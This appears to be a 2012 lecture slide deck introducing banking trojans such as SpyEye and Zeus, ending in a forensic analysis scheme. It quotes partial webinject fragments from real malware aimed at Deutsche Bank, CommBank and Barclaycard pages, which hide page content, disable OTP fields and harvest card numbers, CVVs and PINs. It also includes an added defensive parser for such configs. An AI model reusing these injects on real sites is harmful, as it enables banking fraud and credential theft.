Banking Malware
INTRODUCTION TO CRIMEWARE IN THE BANKING SECTOR
PRESI NELLA RETE - COLLEGIO GHISLIERI, 23 NOVEMBER 2012
Dott. Francesco Schifilliti
WHAT IS A BANKING TROJAN?
001
This term refers to the subset of malware that
seeks to steal data from electronic bank
accounts.
Within this context, other financial services,
such as online stock exchange operations,
are also considered electronic banking.
Zeus, SpyEye… and many others
002
Zeus
SpyEye
Ares
Tatanga
Oddjob
Carberp
Zeus GameOver
Gataka
Shylock
Citadel
Cridex
Torpig
Parties Involved (at a minimum)
003
CyberCrime Organization
Developers
Black Market
Money Mule / Pack Mule
Malware Development
004
CyberCrime Organization
Black Market (Freelance developers)
Developers (Affiliates)
Malware Distribution
005
Malware Authors
User?
Malware Distribution
006
Malware Authors
Pay-per-Install
Drive-by-Download
Exploit-as-a-Service
Pay-per-Install Cycle
007
Malware Authors
Kingpin
Exploit-as-a-Service
Infection and Control Phase
008
Exploit Pack
Compromised Web Site
Spam Mail
Infection
Trojan Repository
Iterating the infection process…
009
Flat Botnet
P2P Botnet
Infection Cycle of Malware on the PC
010
• Infection on disk (e.g. SpyEye copies the file C:\cleansweep.exe)
• Making the MW "persistent" (e.g. by modifying the registry)
• Injection (generally into the Explorer process)
• Extension of the injection (generally with userland hooking techniques)
• Persistent connection to the C&C server
The smell of $$$
011
C&C Server
User
data theft
data & session theft
Man in the Browser
012
OS
Kernel-land
User-land
Anti-Detection/Deception Techniques (MW Code)
013
• Anti Memory
• Anti Emulation
• Anti Debugging
• Anti Disassembler
• Cryptography
• Packing & Protecting
• Obfuscation
Structure of SpyEye
014
Binary
Malware plugins:
• config.dat, ccgrabber
• collectors, sock5
• customconnector
• webinjectors.txt
Packer
Obfuscation
Anti-Dbg
C&C
A snippet of a SpyEye 10.7 webinjector
015
…..
set_url *meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GP
data_before
<body
data_end
data_inject
 style="visibility:hidden"
data_end
data_after
 id=
data_end
data_before
</body>
data_end
data_inject
<script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script><script src='/error.html/trxm1/dbcommon.js'></script><script src='/error.html/trxm1/dbsepa.js'></script><script>if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';}</script>
data_end
data_after
</html>
data_end
…..
A snippet of an ATS webinjector
016
…..
set_url *commbank.com.au/netbank/UserMaintenance* GP
data_before
<h1 class="PageTitle">*My Q*</h1>
data_end
data_inject
<script language="javascript" type="text/javascript">
window.onload = function() {
  for ( i=0; i < document.links.length; i++ )
    if (document.links[i].id != 'H_LogOffLink' &&
        document.links[i].id != 'ctl00_HeaderControl_LogOffLink')
      document.links[i].onclick = function() { return false; };
};
</script>
<script language="javascript" type="text/javascript">
var clck_counter = 0;
function msg(){
  clck_counter++;
  if (clck_counter==2){
    document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden";
    document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none";
    document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true;
    document.getElementById('error').style.top = 42;
    document.getElementById('error').style.left = 42;
    document.getElementById('error').style.visibility = "visible";
    document.getElementById('error').style.display = "block";
  }
  return false;
}
…..
Webinject in cleartext in RAM
https://bcol.barclaycard.co.uk*cardSummary*
<style type="text/css">#inject { display: none; }.ui-dialog { width: 400px; font-size: 11px; }.ui-dialog .ui-dialog-titlebar-close { visibility: hidden; }.ui-dialog .ui-dialog-titlebar { visibility: hidden; display: none; }</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>
value=unescape(document.cookie.substring(offset, end))
jQuery("#inject_cc").focus();
} else if (jQuery("#inject_expdate_mm").val().length < 2) {
alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus();
} else if (jQuery("#inject_expdate_yy").val().length < 2) {
alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus();
} else if (jQuery("#inject_cvv").val().length < 3) {
alert('Please enter correct CVV'); jQuery("#inject_cvv").focus();
} else if (jQuery("#inject_pin").val().length < 5) {
…..
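The webinject fragments on the preceding slides share one grammar: a set_url mask with request flags, followed by data_before / data_inject / data_after sections that each end at data_end. The parser below is an added example (not code from the slides, nor from SpyEye or Zeus) that turns such a config into the two things an analyst wants first, the URL masks being hooked and the script sources the injection loads; the config it parses is a constructed sample whose domains and paths are placeholders.

```python
import re

SECTIONS = ("data_before", "data_inject", "data_after")   # each runs until "data_end"
SCRIPT_SRC = re.compile(r"""<script[^>]*\bsrc=['"]([^'"]+)['"]""", re.I)

def parse_webinjects(text):
    """One dict per set_url block: URL mask, flags (G=GET, P=POST, as in the
    slide's "GP") and the raw data_* fragments in file order."""
    injects, current, section, buf = [], None, None, []
    for line in text.splitlines():
        key = line.strip()
        if key.startswith("set_url"):
            parts = key.split()
            current = {"mask": parts[1], "flags": parts[2] if len(parts) > 2 else "",
                       "data_before": [], "data_inject": [], "data_after": []}
            injects.append(current)
        elif key in SECTIONS:
            section, buf = key, []
        elif key == "data_end":
            if current is not None and section is not None:
                current[section].append("\n".join(buf))
            section = None
        elif section is not None:
            buf.append(line)  # keep leading spaces: " style=..." is injected verbatim
    return injects

def injected_script_sources(injects):
    """External scripts the injected HTML pulls in: paths/hosts worth hunting for."""
    return [s for inj in injects for blob in inj["data_inject"] for s in SCRIPT_SRC.findall(blob)]

# Constructed sample in the layout of the slide's SpyEye 10.7 fragment;
# domains and script paths are placeholders, not real indicators.
SAMPLE = """set_url *bank.example/transfer/enter.data* GP
data_before
</body>
data_end
data_inject
<script src='/error.html/inj/main.do?act=getall'></script><script src='/error.html/inj/common.js'></script>
data_end
data_after
</html>
data_end
set_url *otherbank.example/login* G
data_before
<body
data_end
data_inject
 style="visibility:hidden"
data_end
"""
```

Run against a config recovered from disk or from a memory dump, the returned masks tell you which institutions are targeted and the script sources give the attacker-controlled paths to look for in proxy logs.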
017
SpyEye: an example of modular and parametric MW
018
C&C Server
User
What/how to steal is defined by the plugins installed on the bot:
• billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9
• bugreport.dll_a6c1992119c1550db437aac86d4ffdad
• ccgrabber.dll_5b1593855a6e8f01468878eb88be39df
• creditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2
• ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5
• Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2
• rdp.dll_0cb722049e024f2366ba9c187cb3929f
• ddos.dll_716d82810241daa5e2a41327014e9a77
…on which bank/financial institution to perform fraudulent operations is defined in webinjectors.txt
Collectors
To whom to transmit the data collected by the MW is defined in collectors.txt
A Reference Scheme for the Analysis
019
Forensic Analysis
• Disk Analysis
• MW Searching
• Reg. Analysis
• Browser Analysis
• File Analysis
• Hash Comparing
• Entropy Analysis
MW Analysis
• De-Anti-XYZ
• Disassembling
• Debugging
• Memory Dumping
Live Analysis
• Network Analysis
• Memory Analysis
FULL UNDERSTANDING OF THE FORENSIC ARTIFACT